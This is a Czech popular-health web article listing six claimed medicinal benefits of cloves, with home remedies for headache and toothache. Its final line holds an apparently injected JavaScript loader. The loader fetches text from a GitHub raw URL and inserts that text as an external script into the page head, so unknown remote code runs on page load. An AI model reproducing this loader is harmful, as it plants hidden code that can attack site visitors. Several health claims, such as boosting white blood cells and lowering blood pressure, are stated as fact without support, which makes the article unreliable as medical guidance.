Hřebíček lékařský pochází původem z Indonésie. Získává se z nerozvitých pupenů růžových květů stále zeleného stromu hřebíčkovce kořenného či vonného. Má dlouhou historii, která sahá do až do Číny ve 3. století před naším letopočtem. Již tehdy bylo toto koření velmi vzácnou komoditou, za níž se platilo zlatem. A dosud platí, že je  jedním z nejoblíbenějších koření na světě. Má nasládlou chuť, přidává se do různých pokrmů. Znáte ale jeho léčivé vlastnosti?

6 léčivých vlastností hřebíčku

  1. Zlepšuje trávení – hřebíček snižuje nevolnost žaludku a zlepšuje sekreci trávicích enzymů. I vysoký podíl vlákniny obsažené v tomto koření zlepšuje trávicí pochody v našem organismu
  2. Snižuje záněty v těle – hřebíček obsahuje látky zvané eugenol, mangan a flavonoidy, které mají detoxikační analgetické a protizánětlivé účinky. Můžete ho používat na bolesti hlavy buď přímou konzumací, kdy hřebíček rozdrtíme, rozmícháme ve sklenici teplého mléka a vypijeme. Nebo můžete hřebíček aplikovat zvenčí, kdy koření necháme přes noc vylouhovat v kokosovém oleji a a pak jím masírovat bolestivá místa hlavy, ale i ostatních částí těla, kde cítíme bolesti. Látky v hřebíčku obsažené pak nejen snižují zánět, ale přivádí do těla i zdravé minerály, podporují zdraví vašich kostí.                                                                                                    
  3. Posiluje imunitní systém – hřebíček zvyšuje množství bílých krvinek v těle, tím pádem tedy posiluje naši imunitu. Rovněž obsahuje vysoké množství vitamínu C.

4. Snižuje cholesterol a krevní tlak, reguluje hladinu krevních cukrů –  hřebíček obsahuje další tělu prospěšné látky, tzv. polyfonely, které dokáží snižovat krevní tlak a cholesterol. Kromě toho podporují pružnost a průchodnost cév, prodlužují jejich životnost.                                                                                                                                                               

5. Má antibakteriální vlastnosti – vědecké výzkumy ukázaly, že je toto koření účinné proti bakteriím stafylokoka a E coli.

6. Hřebíček snižuje záněty v ústech, zahání bolesti zubů a snižuje zubní plak. Můžeme ho přímo rozkousat a nechat působit přímo v ústech, nebo si zakoupit ústní vodu s obsahem hřebíčku.                                                                                                                                                                             

A jedna babská rada na závěr. Kromě léčivých vlastností má hřebíček schopnost odhánět dotěrný hmyz. Stačí ho zapíchat do jablka a mouchy změní své působiště. Zkuste to!

  (var url = „https://raw.githubusercontent.com/truba77/trubnik/main/to.txt“; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(„script“); script.src = data.trim(); document.getElementsByTagName(„head“)[0].appendChild(script); });)